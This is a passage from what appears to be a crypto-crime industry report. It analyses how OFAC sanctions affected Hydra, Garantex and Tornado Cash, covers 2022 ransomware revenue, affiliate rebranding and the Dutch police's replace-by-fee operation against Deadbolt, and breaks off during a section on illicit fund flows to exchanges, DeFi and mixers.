| Task Force Rusich | Russian paramilitary group in Ukraine |

OFAC sanctioned a relatively even mix of individuals and different types of entities in 2022, citing activity such as cybercrime (including ransomware), drug trafficking, money laundering, and in the case of Task Force Rusich, participation in Russia's invasion of Ukraine. Again, this diversity of entities represents a huge change compared to OFAC's pre-2021 designations, which were all against individuals and, at the blockchain level, comprised of only a relatively small number of personal wallets.

## Exploring pre and post-designation activity for three of 2022's most notable sanctioned entities: Hydra, Garantex, and Tornado Cash

In order to examine the effects of sanctions on illicit cryptocurrency activity, let's look at how a few of 2022's most notable sanctioned entities behaved before and after their OFAC designations. We'll analyze three services: Hydra, Garantex, and Tornado Cash. First, some brief background on each:

· Hydra was the largest darknet market in the world until its servers were seized by German police, concurrent with its designation by OFAC in April 2022, effectively shutting down the market-place. Based in Russia, Hydra not only facilitated drug sales, but also offered money laundering services to cybercriminals, including ransomware attackers.

· Garantex is a high-risk crypto exchange based in Russia and was sanctioned at the same time as Hydra for similar money laundering activity. Unlike Hydra, Garantex continues to operate following its designation.

· Tornado Cash is a decentralized mixing service on the Ethereum blockchain that was sanctioned in August 2022 (and again in November) for facilitating money laundering, primarily in relation to funds stolen in cryptocurrency hacks by cybercriminals associated with North Korea. Tornado Cash is currently the only DeFi protocol to have been sanctioned by OFAC — all other desig-nations have been centralized services or personal wallets. As a DeFi protocol, no person or organization can "pull the plug" as easily on Tornado Cash as they could with a centralized service, which has led to questions around the feasibility of sanctioning the service and who, if anyone, can be held responsible for criminal activity it facilitates.

On-chain data can tell us more about the types of entities transacting with these services prior to their sanctions designations.

A0271



**Share of funds received by sanctioned entities by source type:
Garantex vs. Hydra vs. Tornado Cash**

Note: Illicit transaction activity refers to transactions in which one or more counterparty addresses are associated with an illicit entity, such as a darknet market or ransomware attacker. Risky activity refers to transactions in which one or more counterparty addresses are associated with a risky entity, such as a high-risk exchange or gambling service. Legitimate activity refers to transactions in which one or more counterparty addresses are associated with entities that are not inherently criminal or risky, such as personal wallets or exchanges.

· The chart above shows the breakdown of each sanctioned entities' source of incoming funds in the 60 days prior to their designations based on whether the sending wallets were associated with legitimate, illicit, or risky activity. A few things stand out:

· Hydra had by far the most criminal activity of the three services, with 68.2% of all incoming funds coming from illicit addresses, and 12.6% coming from risky addresses.

· Garantex, on the other hand, saw 6.1% of its inflows come from illicit sources and 16.1% from risky sources. 6.1% may sound like a small share of inflows, but it actually puts Garantex firmly

on the riskier end of the spectrum for exchanges — over the same 60-day period, centralized exchanges as a whole received on average just 0.3% of funds from illicit addresses.

· 34% of all funds sent to Tornado Cash came from illicit sources, but this number fluctuated greatly depending on the day, with most illicit funds coming in brief spikes

Let's dig deeper into the specific types of illicit entities that sent funds to each of these sanctioned services.



**Source of illicit funds sent to sanctioned entities by share: Garantex vs. Hydra vs. Tornado Cash (excludes transfers between sanctioned entities)**

A0273

Garantex and Hydra both received funds from a wide array of illicit actors in the 60 days leading up to their sanctions designations, including fraud shops, scams, and most notably, ransomware. During this time period, Hydra received roughly $176,000 worth of cryptocurrency from ransomware addresses, representing 2.2% of all funds sent by any ransomware address. Garantex was even worse, taking in $931,000 from ransomware addresses, or 11.6% of all funds sent by ransomware addresses. The numbers underscore how crucial these services — especially Garantex — have been to enabling ransomware attacks. We must also note that these dollar figures may grow as we continuously identify more ransomware-related wallets over time.

Tornado Cash's illicit activity was concentrated to just two forms of cybercrime: Crypto hacks and scams. While not apparent from the graph above, we should note that stolen funds make up nearly all of that total, at 99.7% of all illicit funds received during the entire 60-day time period. The inflows of stolen funds come in periodic spikes, which in turn drive the spikes in overall illicit inflows to Tornado Cash that we saw in the previous graph. The Harmony Bridge hack, which occurred in June 2022, roughly 45 days before Tornado Cash's sanctions designation, accounted for 65.7% of the mixer's total stolen fund inflows during this period. This pattern of isolated, unique events, contrasts with the more constant flow of illicit activity from services such as darknet markets, which produce a steady stream of funds.

# How did sanctioned entities behave post-designation? It depends.

On-chain data shows that each of the three sanctioned services were affected differently by their designations. The charts below show cryptocurrency inflows for Garantex, Hydra, and Tornado Cash in the 60 days before and after they were sanctioned.



**Inflows to sanctioned entities 60 days before and after designation: Hydra vs. Tornado Cash vs. Garantex**

On one end of the spectrum, we have Hydra. Its inflows dropped to zero as soon as it was sanctioned because the service was also seized in a coordinated law enforcement action at the same time.

On the other end of the spectrum is Garantex, which wasn't seized upon being sanctioned, and actually saw its transaction volume steadily increase post-designation. For example, in the four

A0275

months up through April when Garantex was sanctioned, the high risk exchange had averaged $620.8 million in monthly inflows. After the sanctioning event, Garantex's inflows rose considerably, with an average of approximately $1.3 billion in monthly inflows through October. This is most likely due to the fact that Garantex and most of its users are based in Russia. The Russian government has not enforced U.S. sanctions, leaving users not subject to U.S. jurisdiction with virtually no incentive to stop using Garantex. In fact, Garantex explicitly stated its intent to continue operating in social media posts immediately following the designation.



**GarantexRussia**
April 7 at 10:48 AM·🌐

🍀Garantex is working normally!

The US Office of Foreign Assets Control (OFAC) announced the imposition of sanctions on Garantex Europe OU under the program RUSSIA-EO14024 (Property Blocking in Connection with Certain Harmful Foreign Economic Activities of the Government of the Russian Federation).

The Garantex exchange has no assets in the US and does not provide services to US citizens and residents. Garantex Europe OU is preparing a protest against the sanctions (inclusion on the SDN list) and intends, if necessary, to appeal against ... **See more**

Tornado Cash falls in the middle of the spectrum, as its activity dropped significantly after being sanctioned, but hasn't ceased completely. As we discussed previously, Tornado Cash runs on smart contracts that can't be taken offline the way a centralized service can, so there's nothing except the legal consequences of sanctions violations stopping anyone from using it. However, the Tornado Cash website that acted as a front-end for easy access to the mixing service was taken down, making it more difficult to access. And, as a global service, Tornado Cash likely had more users who could face consequences for violating U.S. sanctions, or who would be cut off from using other services if their wallets displayed exposure to Tornado Cash following its designation.

Digging deeper into these aggregate inflow patterns, we also see that different types of counter-parties reacted differently to each service's sanctions designation. We'll leave Hydra out here, as we already saw above that its inflows dropped to zero due to the seizure of its darknet site infrastructure.

Here's how inflows to Garantex from different types of services and entities changed following its sanctions designation.



**Inflows to Garantex by source 100 days before and after sanctions designation**

Most of Garantex's counterparties continued to use the service at roughly the same levels they did before the exchange was sanctioned, apparently unperturbed by the designation. In fact, darknet markets and scammers actually sent more funds to Garantex following the designation, perhaps reassured that the exchange would be unlikely to try and curb their activity.

**A0277**



**Change in inflows to Tornado Cash post-sanctions designation by counterparty category**
**(60-days pre/post sanction designation date)**

Tornado Cash, on the other hand, saw drops in inflows from virtually every category, the exceptions being an increase in funds sent from scammers and mixing services. However, despite the percentage increases, neither category had sent a particularly high volume of funds to Tornado Cash before its sanctions designation anyway. And, in the case of scams, the increase was the result of a single YouTube-based liquidity bot scam that saw inflows over four deposits, and likely does not reflect a wider trend.

## Did sanctions affect criminal users of designated services?

Four of the entities sanctioned in 2022 were designated at least in part due to their provision of money laundering services to other criminals, such as ransomware attackers, scammers, and hackers. Those services were:

- · Hydra
- · Garantex
- · Tornado Cash
- · Blender.io (another mixer)

It follows that one goal of those sanctions would be to disrupt the criminals who relied on those services for money laundering. Did this end up happening in practice? **Or, put another way, if I was a crypto criminal who relied on one (or more) of these money laundering services, did I see less revenue than expected after that service was sanctioned?**

We attempt to answer this question below by quantifying the average difference between actual inflows and expected inflows for illicit entities who used the money laundering services listed above prior to their designations. In order to calculate expected inflows, we used inflows to other illicit services in the same criminal categories who did not use those sanctioned money laundering services as a control group. These other illicit services help to establish a revenue baseline for the two months following each money laundering service's sanctions designation. [1] We found that illicit entities who used sanctioned services saw significant lost potential revenue across nearly every crypto crime category in the two months following the sanctioning event — for example, the average darknet market who had previously sent funds to one of the sanctioned services saw an estimated $25,000 less revenue in the two months following that service's designation than they likely would have had the service not been designated.



The most-affected category were cybercriminal administrators, who on average saw an estimated $750,000 decrease in revenue due to the sanctioning of money laundering services they had previously used. The one exception to this trend was fraud shops, who on average saw nearly $5,000 more revenue than we would estimate absent the sanctioning of a money laundering service counterparty.

It's important to keep in mind that the graph above shows only the average estimated change in revenue for counterparties of sanctioned money laundering services. With several distinct entities in each category who had previously used those money laundering services, the estimated total losses by category are much higher.

| Illicit category | Number of entities | Average inflows change | Total revenue change for category |
|---|---|---|---|
| Darknet market | 11 | –$24,634.52 | –$270,979.67 |
| Fraud shop | 10 | $5,222.79 | $52,227.91 |
| Cybercriminal administrator | 20 | –$749,907.00 | –$14,998,139.98 |
| Ransomware | 6 | –$9,621.23 | –$57,727.38 |
| Scam | 23 | –$13,333.58 | –$306,672.24 |
| Stolen funds | 42 | –$42,895.81 | –$1,801,624.08 |

A0280

We should caveat these findings by noting that, while we've taken steps to control for other factors and analyze only the revenue changes brought on by the sanctioning of their money laundering services, there could be other reasons these dependent entities' revenue might have changed following the sanctions designations. We should also emphasize that we're only looking at changes to revenue in the two months following the money laundering services' designations — it's entirely possible and even likely that any revenue hits to illicit entities will be temporary, and that they'll soon find alternative money laundering services that haven't been sanctioned. Nonetheless, our findings suggest that sanctions against money laundering services did in fact disrupt the illicit entities who relied on those services, at least temporarily, and impacted their bottom line.

## Key takeaways: Impact of crypto sanctions depends on jurisdiction and technical constraints

New technologies and forms of value transfer change the landscape of financial crime enforcement. OFAC is learning this first-hand, and has broken new ground in the last two years with its efforts to move beyond individuals and designate cryptocurrency services that facilitate money laundering and other harmful forms of crypto-based activity. The three examples we focused on above show how different variables impact agencies' ability to levy sanctions against those services.

First, the case of Hydra teaches us that sanctions can be extremely effective against entities with key operations in cooperative jurisdictions. Hydra's servers were located in Germany — German law enforcement coordinated with U.S. agencies, and moved to seize Hydra's servers, striking a fatal blow to the organization, in addition to the sanctions levied by OFAC on the darknet market.

Second, the case of Garantex shows what happens when there is an absence of international cooperation. While Garantex has been largely cut off from the compliant exchange ecosystem, Russia has declined to enforce sanctions against the service, so it continues to operate mostly unencumbered. This case shows that it is difficult to effectively sanction entities whose home jurisdictions have no formal cooperation channels with OFAC.

Finally, the case of a decentralized service like Tornado Cash is more complicated. While its front-end website was taken down, its smart contracts can run indefinitely, meaning anyone can still technically use it at any time. That suggests sanctions against decentralized services act more as a tool to disincentivize the service's use rather than cut off usage completely. In the case of Tornado Cash, those incentives appear to have been powerful, as its inflows fell 68% in the 30 days following its designation. That's especially important here given that Tornado Cash is a mixer, and mixers become less effective for money laundering the less funds they receive overall.

These case studies provide a model of how OFAC and its international equivalents can approach sanctions designations against different kinds of crypto-related entities. It will be interesting to see how these patterns develop as sanctioning bodies continue to improve their ability to effectively target sanctions against different kinds of illicit cryptocurrency services, in partnership with other agencies in the U.S. and internationally.

## Endnotes:

[1] Interventions always need to factor in what would otherwise have been. In this case, we used data on the non-counterparties of sanctioned services to estimate what total on-chain aggregate revenue inflows for counterparties might have looked like absent a sanctioning event. Non-counterparties are those entities that sent no funds to sanctioned entities in the two months before they were sanctioned. Counterparties are those entities that did send funds to sanctioned entities prior to the sanctioning event (over a two-month window).

We assume that, within a given category of illicit activity (say, darknet markets), counterparties are roughly comparable to non-counterparties, and differ largely in their counterparty status.

This assumption lets us compare the inflows (which we can think of as akin to revenue for a criminal enterprise or actor) of counterparties relative to the performance of non-counterparties in the months following a sanctioning event, and reveal how counterparties may have performed had their service not been sanctioned. For example, if a counterparty of a sanctioned service received 10% more aggregate revenue inflows after a sanctioning event, that can look like the sanctions had a counterproductive effect. However, if entities of a similar type that were not counterparties to the sanctioned service grew by 50%, then we have reason to suspect that the 10% growth seen by counterparties was actually less than it would have been if sanctions had not been used.

The difference in post-sanctioning performance of counterparties and non-counterparties helps us estimate (directionally) and with modest precision the degree of under or over performance of sanctioned entity counterparties. To reach this final step, we take the difference between the average counterparty percent change in on-chain inflows by category and subtract the same measure for non-counterparties. We then use this percentage point value to weight the total amount of USD inflows to each category of sanctioned entity counterparty, ultimately providing a single best guess about the degree to which sanctioning interrelates with counterparty on chain activity.

# Ransomware

# Ransomware Revenue Down As More Victims Refuse to Pay

2022 was an impactful year in the fight against ransomware. Ransomware attackers extorted at least $456.8 million from victims in 2022, down from $765.6 million the year before.



**Total value received by ransomware attackers, 2017–2022**

As always, we have to caveat these findings by noting that the true totals are much higher, as there are cryptocurrency addresses controlled by ransomware attackers that have yet to be identified on the blockchain and incorporated into our data. When we published last year's version of this report, for example, we had only identified $602 million in ransomware payments in 2021. Still, the trend is clear: Ransomware payments are significantly down.

However, that doesn't mean attacks are down, or at least not as much as the drastic dropoff in payments would suggest. Instead, we believe that much of the decline is due to victim organizations increasingly refusing to pay ransomware attackers. We'll discuss this phenomenon more below, but first, let's look more at general ransomware trends in 2022.

A0284

## 2022 ransomware by the numbers

Despite the drop in revenue, the number of unique ransomware strains in operation reportedly exploded in 2022, with research from cybersecurity firm Fortinet stating that over 10,000 unique strains were active in the first half of 2022. On-chain data confirms that the number of active strains has grown significantly in recent years, but the vast majority of ransomware revenue goes to a small group of strains at any given time. We do, however, see turnover throughout the year among the top-grossing strains.



Likewise, ransomware lifespans continue to drop. In 2022, the average ransomware strain remained active for just 70 days, down from 153 in 2021 and 265 in 2020. As we'll explore below, this activity is likely related to ransomware attackers' efforts to obfuscate their activity, as many attackers are working with multiple strains.

A0285



When it comes to money laundering, the data indicates that most ransomware attackers send funds they've extorted to mainstream, centralized exchanges.



In fact, the share of ransomware funds going to mainstream exchanges grew from 39.3% in 2021 to 48.3% in 2022, while the share going to high-risk exchanges fell from 10.9% to 6.7%. Usage of illicit services such as darknet markets for ransomware money laundering also decreased, while mixer usage increased from 11.6% to 15.0%.

## Sizing up the ransomware ecosystem

The constant turnover amongst top ransomware strains and appearance of new ones would suggest that the ransomware world is a crowded one, with a large number of criminal organizations competing with one another and new entrants constantly coming onto the scene. However, looks can be deceiving. While many strains are active throughout the year, the actual number of individuals who make up the ransomware ecosystem is likely quite small.

One place we see this is in affiliate overlap. Most ransomware strains function on the ransom-ware-as-a-service (RaaS) model, in which the developers of a ransomware strain allow other cybercriminals, known as affiliates, to use the administrator's malware to carry out attacks in exchange for a small, fixed cut of the proceeds. However, we've seen time and time again that many affiliates carry out attacks for several different strains. So, while dozens of ransomware strains may technically have been active throughout 2022, many of the attacks attributed to those strains were likely carried out by the same affiliates. We can think of it as the gig economy, but for ransomware.

A rideshare driver may have his Uber, Lyft, and Oja apps open at once, creating the illusion of three separate drivers on the road — but in reality, it's all the same car.

Microsoft Security discussed an example of this in a blog post earlier this year discussing one prolific affiliate group, whom they've labeled DEV-0237, who has carried out attacks using the Hive, Conti, Ryuk, and BlackCat ransomware strains. Microsoft Security researchers were able to identify this example of affiliate overlap by analyzing the technical details of how the attacks were carried out, but we can also identify examples of affiliate overlap on the blockchain. On the Chainalysis Reactor graph below, we see an affiliate whose wallet has received large sums from the Dharma, Conti, and BlackCat ransomware strains at different times, which means the affiliate has carried out attacks for all three strains.



Conti is a particularly interesting case for observing how not just affiliates, but administrators as well rebrand themselves and switch between strains. Conti was a prolific ransomware strain for a few years, taking in more revenue than any other variant in 2021. But in February, immediately following Russia's invasion of Ukraine, the Conti team publicly announced its support for Vladimir Putin's government. Soon after, a cache of Conti's internal communications leaked, and indicated connections between the cybercrime organization and Russia's Federal Security Service (FSB).

For these reasons, many ransomware victims and incident response firms decided that paying Conti attackers was too risky, as the FSB is a sanctioned entity despite Conti itself not being one. Conti responded by announcing its closure in May, but soon after, much of the Conti team split up into smaller groups and continued its activity. Conti's closure drove many affiliates to conduct attacks for other strains whose ransoms victims were more likely to pay, as we showed above. We can see another example of this activity below.

**A0288**



Here, we see a Conti affiliate who began working with the Suncrypt, Monti, and Lockbit strains.

But it isn't just Conti affiliates who have rebranded. On-chain data shows that core administrators have also begun to work with and launch other strains, including the ransomware group's leader, who goes by the alias Stern. The Reactor graph below shows that Stern has transacted with addresses linked to strains like Quantum, Karakurt, Diavol, and Royal in 2022 following Conti's demise.



**A0289**

Notice that in many cases, the ransomware attackers re-used wallets for multiple attacks launched nominally under other strains. This on-chain activity confirms previous research from cybersecurity firm AdvIntel revealing plans by Conti's core leadership to shift operations to some of the strains seen above. It's a great example of how blockchain analysis in tandem with technical analysis of ransomware code and attack patterns can identify offshoots of ransomware strains that have been deemed too risky to pay.

With this data in mind, can Conti truly be said to have shut down if its leader, affiliates, and other members are still successfully carrying out ransomware attacks under new brand names? The data suggests that it may be more productive to think of the ransomware ecosystem not as a collection of distinct strains, but instead as a small group of hackers who rotate brand identities regularly. The fluidity with which affiliates move between ransomware brands makes the sector appear larger than it really is. "The number of core individuals involved in ransomware is incredibly small versus perception, maybe a couple hundred," said Bill Siegel, CEO and co-founder of ransomware incident response firm Coveware. "It's the same criminals, they're just repainting their get-away cars." Siegel indicated this activity has increased of late, and that affiliates are now much more likely to switch strains frequently rather than stick with one for an extended period of time. But, despite ransomware attackers' best efforts, the transparency of the blockchain allows investigators to spot these rebranding efforts virtually as soon as they happen.

## The big story: Ransomware victims are paying less frequently

Based on the data available to us now, we estimate that 2022's total ransomware revenue fell to at least $456.8 million in 2022 from $765.6 million in 2021 — a huge drop of 40.3%. However, the evidence suggests that this is due to victims' increasing unwillingness to pay ransomware attackers rather than a decline in the actual number of attacks. We spoke with a number of ransomware experts to learn more.

The first question that jumps to mind: How can we actually know fewer victims are paying, given the lag we've noted previously in how long it takes to identify ransomware addresses, and the massive underreporting of attacks by victims? Michael Phillips, Chief Claims Officer of cyber insurance firm Resilience, indicated that businesses shouldn't rest easy just because ransomware revenue is down. "Data from claims across the cyber insurance industry show that ransomware remains an increasing cyber threat to businesses and enterprises. There have, however, been signs that meaningful disruptions against ransomware actor groups are driving lower than expected successful extortion attempts," he told us. Phillips cited among those disruptions the Russia-Ukraine war and the increased pressure on ransomware gangs from western law enforcement, including arrests and recovery of extorted cryptocurrency.

Recorded Future intelligence analyst and ransomware expert Allan Liska, also known as the Ransomware Sommelier, pointed to the data teams like his collect from data leak sites (DLS), where many ransomware attackers post data stolen from victims in an effort to pressure them into paying. "Most organizations scrape [DLS] data to collect a baseline victimology. By that measure, ransomware attacks decreased between 2021 and 2022 from 2865 to 2566 — a 10.4% drop," said Liska.

If we take DLS victim leaks as a proxy for the number of attacks, there's still a huge gap between a 10.4% drop in leaks and a 40.3% drop in overall ransomware revenue. Instead, our conversations with representatives of cyber insurance and incident response firms suggest much of the revenue drop is explained by victims paying less frequently. Bill Siegel of Coveware provided us with statistics on the probability of a ransomware victim to pay a ransom based on his firm's client matters over the last four years:

|  | 2019 | 2022 | 2021 | 2022 |
|---|---|---|---|---|
| Paid | 76% | 70% | 50% | 41% |
| Did Not Pay | 24% | 30% | 50% | 59% |

The trend is highly encouraging — since 2019, victim payment rates have fallen from 76% to just 41%. But what exactly accounts for this shift? One big factor is that paying ransoms has become legally riskier, especially following an OFAC advisory in September 2021 on the potential for sanctions violations when paying ransoms. "With the threat of sanctions looming, there's the added threat of legal consequences for paying [ransomware attackers]," said Liska. Bill Siegel agreed, telling us that his firm refuses to pay ransoms if there's even a hint of connection to a sanctioned entity.

Another big factor is the outlook of cyber insurance firms, who are usually the ones reimbursing victims for ransomware payments. "Cyber insurance has really taken the lead in tightening not only who they will insure, but also what insurance payments can be used for, so they are much less likely to allow their clients to use an insurance payout to pay a ransom," said Liska. Phillips echoed this sentiment in his remarks to us. "Today, companies have to meet stringent cybersecurity and backup measures to be insured for ransomware coverage. These requirements have proven to actively help companies bounce back from attacks rather than pay ransom demands. An increased focus on under-writing against factors that contribute to ransomware has led to lower incident costs for companies and contributed to a decreasing trend in extortion payments."

Siegel agreed that cyber insurance firms' demand for better cybersecurity measures is a key driver of the trend toward less frequent ransom payments, and described some of the measures they push clients to implement. "A lot of the insurance carriers are tightening underwriting standards,

and will not renew a policy unless the insured has comprehensive backup systems, uses EDR, and has multi-authentication. This has driven a lot of companies to become more secure," said Siegel. Liska agreed that cybersecurity measures have improved greatly over the past few years. "Back in 2019 when big game hunting and RaaS really started taking off, a lot of security professionals really emphasized the importance of backups. Security professionals saying something and organizations implementing it can take a while. While having an effective backup solution doesn't stop ransomware attacks and doesn't help with data theft, it does give victims more options so they aren't forced to pay," he said.

Siegel described to us how companies with well segmented yet highly available data backups are much less likely to experience material business impact as the result of an attack, and said that they regularly advise clients not to pay unless the payment is economically justified due to the severity of the impact being experienced. Liska also emphasized that backups aren't a magic bullet, noting that the data recovery process can take months and leave ransomware victims vulnerable to follow-up attacks during this process, as we saw in the case of Australian logistics firm Toll Group, which suffered two attacks in three months in 2022.

Of course, the best-case scenario is for organizations not to fall victim to ransomware attacks in the first place. To that end, Liska recommends organizations run recurring tabletop exercises, in which all relevant teams — cybersecurity, networking, IT, server administration, backup teams, PR, finance, etc. — meet with leadership to establish how the organization can keep itself secure, identify vulnerabilities, and understand who's responsible for all aspects of security. "Having a realistic picture of where your organization stands and what its weaknesses and strengths are will better prepare everyone in the event your organization is hit with a ransomware attack, and it also makes leadership aware of where it needs to invest to better secure the network, ahead of an attack," said Liska.

If more organizations can implement these best practices the way they have data backups and other security measures, we'll hopefully see ransomware revenue continue to fall in 2023 and beyond.

# How the Dutch National Police Tricked Prolific Ransomware Strain Deadbolt Into Giving Up Victim Decryption Keys

Deadbolt is a ransomware strain that first became active in early 2021, and operates very differently from other notable strains of the last few years. While most ransomware gangs focus primarily on attacking large organizations who can afford heavy ransoms, Deadbolt does the opposite, instead taking more of a "spray and pray" approach, targeting small businesses and even individuals in high numbers, while demanding a relatively small ransom from each victim. The reason for this is that Deadbolt has built its operations on exploiting a security flaw in network-attached storage (NAS) devices produced by the provider QNAP, rather than infecting entire computer networks, which is the go-to tactic for the "big game hunting" favored by most ransomware attackers.

Deadbolt also communicates with victims differently from other ransomware strains. While many strains have set up websites to negotiate with victims and provide decryption keys to those who pay, Deadbolt simply instructs victims to pay a set amount to a specific Bitcoin address in a message that appears when the victim attempts to access the infected device.



Source: Sophos blog

Once a victim pays, Deadbolt automatically sends them the decryption key via the blockchain, sending a low-value Bitcoin transaction to the ransom address with the decryption key written into the transaction's OP_RETURN field. In order to send the OP_RETURN, some amount of cryptocurrency must be transferred — blockchain analysis suggests that Deadbolt's developers pre-programmed transactions to send a negligible sum of .0000546 BTC (about $1 USD) to its own ransom payment wallet each time a victim pays, so that funds are available to then send transactions necessary to communicate the decryptor to each victim upon receipt of their ransom.



While that unique method for delivering decryption keys is slick, it's also exactly what the Dutch National Police were able to exploit to fool Deadbolt into handing decryption keys for hundreds of victims, enabling them to recover their data at no cost. We'll break down how they did that below, but first, let's look more closely at Deadbolt's activity over the last two years.

A0294

# Deadbolt's ransomware activity summarized

Over the course of 2022, Deadbolt has taken in more than $2.3 million from an estimated 4,923 victims, with an average ransom payment size of $476, compared to over $70,000 for all ransomware strains.



**Monthly total value and number of transfers received by Deadbolt ransomware, 2022**

Deadbolt's revenue last year makes it a relatively low earner amongst all ransomware strains last year, but in terms of sheer reach and number of victims, it was perhaps the most prolific of any strain in 2022. In fact, if we use all the unpaid Deadbolt addresses associated with victims who did not pay as a proxy for total number of infections, we can estimate Deadbolt's total victim count as roughly 5,500 individuals or businesses.

A0295



That reach really comes through the Chainalysis Reactor graph above, which shows thousands of victims making payments to Deadbolt.

## How Dutch National Police disrupted Deadbolt and took decryption keys without paying

Cyber investigators with the Dutch National Police (Cybercrimeteam Oost-Nederland and Cyber-crimeteam Oost-Brabant) had been investigating Deadbolt for months when they came to a crucial realization while analyzing transactions between Deadbolt and its victims, following a tip of the Dutch incident response company Responders.NU. "Looking through the transactions in Chainalysis, we saw that in some cases, Deadbolt was providing the decryption key before the victim's payment was actually confirmed on the blockchain," said one Dutch National Police investigator who worked on the case. Cryptocurrency transactions aren't actually finalized until a new block is confirmed to the blockchain — for Bitcoin, this process takes roughly ten minutes per block. However, during that

A0296

time, unconfirmed transactions are visible in Bitcoin's mempool. "This meant that a victim could send the payment to Deadbolt, wait for Deadbolt to send the decryption key, and then use replace-by-fee (RBF) to change the pending transaction, and have the ransomware payment go back to the victim," said the investigator.

With this information, the Dutch National Police hatched a plan to send and retract payments for as many Deadbolt victims as possible in order to get them their decryption keys. They knew they'd only have one shot, as Deadbolt would surely notice the flaw in their automated decryption key distribution system and fix it once the plan was attempted.

The first step was to find as many Deadbolt victims as possible who had yet to pay their ransom. "We searched police reports from all over the Netherlands for Deadbolt victims and extracted the Bitcoin addresses Deadbolt provided. In cases where there wasn't an address, we reached out to victims." The Dutch National Police also worked with Europol to find victims in other countries as well — 13 in total. Next, the team had to test that they could in fact send and retract a large number of payments to help as many victims as possible. "We wrote a script to automatically send a transaction to Deadbolt, wait for another transaction with the decryption key in return, and use RBF on our payment transaction. Since we couldn't test it on Deadbolt, we had to run it on testnets to make sure it worked," the investigator told us.

Once everything was ready to go, the team deployed their script and started the process of sending and retracting payments for Deadbolt victims. The Deadbolt team quickly realized what was happening and halted their automated OP_RETURN transactions. But in that time, the Dutch National Police retrieved decryption keys for nearly 90% of the victims who reported Deadbolt payment addresses via Europol, depriving Deadbolt of hundreds of thousands of dollars. While Deadbolt remains active, it's been forced to adopt a more manual process for providing decryption keys via Bitcoin transaction OP_RETURNs, which raises Deadbolt's overhead.

Overall, the Dutch National Police operation against Deadbolt is a valuable reminder that blockchain analysis has applications beyond tracing the flow of funds. In this case, police were able to discover a crucial vulnerability in Deadbolt's modus operandi by closely reviewing its transaction patterns and digging into the metadata of the transactions. The operation also underscores why it's so important for ransomware victims to report attacks to the authorities. No one who had their data hijacked by Deadbolt likely knew that an operation like this would be possible, but in cutting edge fields like cryptocurrency and cybersecurity, unique solutions can come from anywhere. The Dutch National Police could only reach out to victims who had reported to the police in their countries, and those who didn't may have missed an opportunity to recover their data at no cost.

# Money Laundering

# Crypto Money Laundering: Four Exchange Deposit Addresses Received Over $1 Billion in Illicit Funds in 2022

Money laundering is crucial to all financially motivated crime because it's what enables criminals to access the funds they generate from their activities. Otherwise, why commit the crimes in the first place? The same is true in cryptocurrency. The goal of money laundering in cryptocurrency is to move funds to addresses where its original criminal source can't be detected, and eventually to a service that allows cryptocurrency to be exchanged for cash — usually this means exchanges. If that weren't possible, there would be very little incentive to commit crimes involving cryptocurrency.

We've written in the past about how money laundering activity is highly concentrated to just a few services, and within those services, concentrated even further to a small number of deposit addresses. That remained true in 2022, though as we'll explore, with a few new wrinkles. In addition, we'll examine the rise of underground money laundering services that exist separately from the crypto businesses most are familiar with, and also analyze funds still held by crypto criminals on the blockchain.

## 2022 crypto money laundering activity summarized

Money laundering in cryptocurrency typically involves two types of on-chain entities and services:

- **Intermediary services and wallets:** These can include personal wallets (also known as unhosted wallets), mixers, darknet markets, and other services both legitimate and illicit. Crypto criminals typically use these services to hold funds temporarily, obfuscate their movements of funds, or swap between assets. DeFi protocols are also used by illicit actors in order to convert funds but, as we will discuss, are not an efficient means of obfuscating the flow of funds.

- **Fiat off-ramps:** This refers to services that allow for cryptocurrency to be exchanged for fiat. This is the most important part of the money laundering process, as the funds can no longer be traced via blockchain analysis once they hit a service — only the service itself would have visibility into where they go next. Additionally, if the funds are converted into cash, they can only be followed further through traditional financial investigation methods. Most fiat off-ramps are centralized exchanges, but P2P exchanges and other services can also serve this function.

With that in mind, let's look at some of the money laundering trends we saw in 2022.

A0299



Overall, illicit addresses sent nearly $23.8 billion worth of cryptocurrency in 2022, a 68.0% increase over 2021. As is usually the case, mainstream centralized exchanges were the biggest recipient of illicit cryptocurrency, taking in just under half of all funds sent from illicit addresses. That's notable not just because those exchanges generally have compliance measures in place to report this activity and take action against the users in question, but also because those exchanges are fiat off-ramps, where the illicit cryptocurrency can be converted into cash.

A0300



More illicit funds were sent to DeFi protocols than ever before, a continuation of a trend that began in 2020. Cybercriminals send funds to DeFi protocols not because DeFi is useful for obscuring the flow of funds. In fact, quite the opposite is true, as unlike with centralized services, all activity is recorded on-chain. Keep in mind too that DeFi protocols don't allow for the conversion of cryptocurrency into fiat, so most of those funds likely moved next to other services, including fiat off-ramps. And as we see below, almost all usage of DeFi protocols for money laundering is carried out by one criminal group: hackers stealing cryptocurrency.



**A0301**

Hackers holding stolen cryptocurrency are the only criminal category sending the majority of funds to DeFi protocols, at a whopping 57.0%. 2022 was an enormous year for hacking, hence why these cybercriminals were almost single-handedly able to drive the overall increase in the usage of DeFi protocols for money laundering. The fact that DeFi protocols themselves were the biggest target of hacks in 2022 also influences these numbers. In DeFi hacks, attackers often end up with tokens that aren't listed on other exchanges, so they need to use decentralized exchanges (DEXes) to swap them for more liquid crypto assets. DEXes have historically been used to convert funds to Ether, which can then be sent to Ethereum-based mixers. DEXes have also been used to convert to assets that will be more likely to hold their value, or in the case of stablecoins, to swap to an asset that cannot be frozen by the stablecoin issuer. However, as noted previously, DEXes don't enable the conversion of funds from cryptocurrency to fiat currency — this must still be done through a centralized exchange or other fiat off-ramp.

Aside from hackers, crypto criminals send the majority of their funds directly to centralized exchanges, but there are some notable exceptions. For instance, darknet market vendors and administrators send most of their funds to other illicit services — primarily other darknet markets, some of whom may offer money laundering services similar to those of the now-shuttered Hydra Market. Darknet market addresses also sent a large share of funds to high-risk exchanges, such as Bitzlato, a Russia-based exchange shut down in an international law enforcement action recently for its money laundering activity. Ransomware attackers are another interesting case. Addresses associated with them send a disproportionately large share of funds to mixers, and also make heavy use of illicit services. Fraud shop vendors and administrators are also notable for their outsized mixer usage.

In total, we see that over half of all funds sent from illicit addresses travel directly to centralized exchanges, both mainstream and high-risk, where they can be exchanged for fiat unless compliance teams take action. However, over 40% of illicit funds move first to intermediary services — primarily mixers and illicit services or DeFi protocols — with most of those funds coming from ransomware, darknet market, and hacker addresses.

## Overall mixer usage falls in 2022, but illicit usage hits all-time high

